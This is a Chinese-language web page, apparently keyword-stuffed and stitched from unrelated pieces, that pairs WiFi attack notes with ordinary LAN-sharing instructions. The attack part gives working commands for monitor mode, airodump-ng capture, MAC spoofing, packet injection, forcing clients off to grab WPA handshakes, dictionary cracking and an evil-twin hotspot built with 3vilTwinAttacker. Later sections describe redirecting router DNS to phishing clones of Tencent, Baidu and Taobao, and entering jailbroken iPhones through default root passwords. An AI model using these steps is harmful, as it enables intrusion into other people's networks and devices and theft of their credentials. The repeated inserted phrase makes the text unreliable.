5.无线渗透 wpa wifi 破解

Ess 人类可记忆 的名字(wifi名字)

Bss 无线ap 的mac地址

破解WiFi看下面 破解wpa

iwconfig

iw list

iw dev wlan0mon set channel 4 更改所在信道为4

iwlist wlan0mon channel 查看 wlan0mon 所在的信道 所在信道要与 要抓的信道在同一信道

iw dev wlan0 scan | grep SSID 扫描附 近的 ap (WiFi)

iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID" 可以筛选出在地基信道

iw dev wlan0 interface add wlan0mon type monitor 添加可以监听的网卡接口 注意wlan0, 是wifi渗透工具局域网你自己的无线网卡 用 iwconfig 可以查看 可能是wlan1 或者 wlan2 之后就可以在 iwconfig 里看到 wlan0mon (如果看不到 尝试 关闭 service network-manager stop 服务) 然后使用 ifconfig wlan0mon 启动 ,之后就可以用wireshark 进行抓包

iw dev wlan0mon interface del 删除添加的网卡接口

service network-manager stop 首先先关闭 这个服务

airmon-ng check 可以检查出有可能冲突的进程

airmon-ng check kill 可以杀掉全部冲突进程

airmon-ng start wlan0 6 在wlan0上启动侦听 这个数字 6 就是启动在哪个信道上监听 可以不写 和上面iw的命令没有区别

iwlist wlan0mon channel 查看当前在第几信道

airmon-ng stop wlan0mon 关闭监听 然后再用 ifconfig wlan0 up 启动无线网卡 再使用 service network-manager start 进行服务启动 可以进行正常的使用

airodump-ng wlan0mon 抓包 默认抓取所有信道的 包 airodump-ng wlan0 -c 1 这个数字1 代表抓取1信道的包

airodump-ng wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w filename.cap --ivs 后面这些 每一个都是可以省略的 --bssid 代表 只抓取这个 ap的包 -w 文件名 可以把抓到的包 保存成文件 --ivs 代表只抓 wep 加密的包

包注入 注意让自己和目标在同一信道

如果发包是 要伪造源地址 可以用 macchanger -m 00:11:22:33:44:55 wlan0mon 将自己的mac 地址 与要伪造的地址改成相同

aireplay-ng -9 wlan0mon 注包测试 如果不成功 可以运行 ifconfig wlan0mon up 试试

这时网络中会有两个相同mac 的设备 会有丢包

如果WiFi 只使用mac地址过滤没有密码wifi渗透工具局域网你就可以连接上了,可以配合破解的WiFi密码 进行使用破解的WiFi密码 加上mac地址伪造连接有密码有mac绑定的 WiFi

比较简单 只要抓到足够多的包就能完全破解

思路 暴力破解

抓到一位用户的握手包

如果有用户已经连接上 可以使他断线重连 就能得到握手包(千万别傻等别人连接)

然后将大量的密码字典放进握手包里计算看看是不是对的密码 使用这种方式要用显卡跑会快很多,也可以去淘宝找人跑包

开启一个wifi热点

使用上面这个命令后 用 ifconfig -a 可以查看到 多出了一个网卡 叫 at0 下一步就是把at0 和 eth0 (就是连接外网的网卡 如果是用WiFi 就是wlan0 之类的) 桥接起来

apt-get install bridge-utils 桥接网卡工具包

桥接接口的 成员接口 就是eth0 和 at0 是不能有ip 地址的 所以分别使用

ifconfig eth0 0.0.0.0 up

ifconfig at0 0.0.0.0 up

来启动这两个接口 IP地址是0.0.0.0

再使用

ifconfig bridge 192.168.1.10 up

给上面创建的桥接网卡 一个ip地址 并up起来 这个IP地址 使用 上面eth0 的IP地址

添加一个网关 目的是让 连接到黑客开启的WiFi 的用户可以直接到现实路由中 获取ip地址

netstat -nr

route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1

启动IP 转发

echo 1 /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward 确认修改完成

git clone

cd 3vilTwinAttacker

chmod +x installer.sh

./installer.sh --install

这样就安装成功了

启动工具使用

wifi-pumpkin 不是之前的3vilTwinAttacker 看最后安装完成的命令行 红色的字 执行这个命令 在终端

如何只用一个WiFi，渗透进企业全部内网

那你需要一个支持热点接入的设备，然后再搭建VPN。比如蒲公英VPN...

如何在无线网wifi下建立一个局域网

wifi渗透工具局域网你可以用个性能好点的USB无线网卡。

无线网卡接联网的那台电脑wifi渗透工具局域网，装好驱动。

接着wifi渗透工具局域网，转到USB网卡这边wifi渗透工具局域网，在设置里面建立一个无线连接点（自己设好密码）

然后在那台电脑本身的无线网卡的高级设置里面设置为共享（就是允许其他的电脑通过这台电脑来上网）

最后，这台电脑就自己连接自己的USB网卡的连接点，其他电脑全部用无线网卡进行搜索，搜索到连接点后输入密码就可以连上，现在 凡是连接到USB网卡这台电脑的，都在一个局域网内

这种方法简单，150M的USB无线网卡带3台电脑玩红警绰绰有余，不要用电脑自带的无线网卡来玩，卡。

另一种就是干脆买个路由器

如何利用wifi局域网渗透安卓手机

以前在安全论坛看过，拿到密码后，破路由器，路由进了，修改DNS服务器，然后自己架设DNS，换之。然后通过自己的DNS把用户引导到自己已经假设好的钓鱼网站上，钓鱼网站可以伪造成知名站点，腾讯、百度、淘宝。安全思路，仅供学习。

如何利用wifi局域网渗透苹果手机

一:需要条件

1.在公共WIFI内登陆.

2.越狱的iPhone.(国内的iPhone基本都越狱了)

3.越狱的时候安装了openssh(基本越狱的都安装了.)

4.越狱后未修改root密码.(国内越狱的iPhone基本都没改密码)

二:使用putty登陆root

1.未修改过iphone地址的密码(国内越狱的iPhone基本都没改密码)

工具:91手机助手iphone版2.9.60.263 (必须使用2.9.60.263这个版本)

首先登陆路由器默认192.168.1.1 查看 客户端列表显示如下

ID客户端名 MAC 地址 IP 地址 有效时间

iPhone40 A6-D9-1D-XX 192.168.1.131 01:40:30

PC-201105282 2B-XX-XX-2E-32 192.168.1.100 01:30:56

none 24-AB-XX-XX-17-76 192.168.1.xxx 01:19:03

看到iphone的P地址显示为192.168.1.xxx

打开91手机助手iphone版2.9.60.263

选者使用wi-fi连接.然后会弹出一个窗口

Iphone地址: 192.168.1.xxx

密码: nd.com.cn (默认密码国内基本都没改)

好这样就已经连接到了对了，91手机助手下载电脑上，然后wifi连接手机

同一个wifi下怎么建立局域网

1、将光猫伸出来的网线插入路由器的wan插口wifi渗透工具局域网，按照路由器进入管理员入口的方法登陆（不同的路由器品牌登陆的方式不同）wifi渗透工具局域网，设置好路由器里的上网设置（主要是你家网络的账号密码）wifi渗透工具局域网，再找到“无线设置”，设置一下无线的名称和密码。

2、右键点击计算机（我的电脑），查看要组网的几台电脑工作组名称是否在同一个工作组（查看方法相同），若不在同一组，点击高级系统设置---计算机名---更改---工作组名称更改为相同的（为wifi渗透工具局域网了方便，也可将计算机名称改一下），改完后点击确定（先不要重启电脑）。

3、打开网络与共享中心----将网络设置为家庭或工作---点击更改高级共享设置----选中”启用网络发现“、”启用文件和打印机共享“、“启用共享以便可以访问”三项，关闭“密码保护共享”，点击“保存修改”。

4、打开控制面板----点击右上角“查看方式”，选择小图标------双击“管理工具”进入管理界面---双击“服务”

分别双击DNS client 、function discovery resource publication、SSDP discovery、UPnP device host、computer browser、server、TCP/IP netbios helper七项，将它们设置为自动启动。

5、打开控制面板----点击右上角“查看方式”，选择小图标------双击“管理工具”进入管理界面---双击本地安全策略---双击本地策略---双击用户权力分配，“从网络访问此计算机”中加入guest账户，从“拒绝从网络访问此计算机”中删除guest账户。

6、打开控制面板----点击右上角“查看方式”，选择小图标------双击“管理工具”进入管理界面------双击本地安全策略---双击本地策略---双击安全选项，将“网络访问：本地账户的共享和安全模式”设为“紧来宾----”。

局域网内所有电脑都设置完成，重启电脑后，就会在网络（或网上邻居）里看到局域网内的其他电脑，并且可以共享文件盒打印机，以及实现局域网内的电脑互相访问了。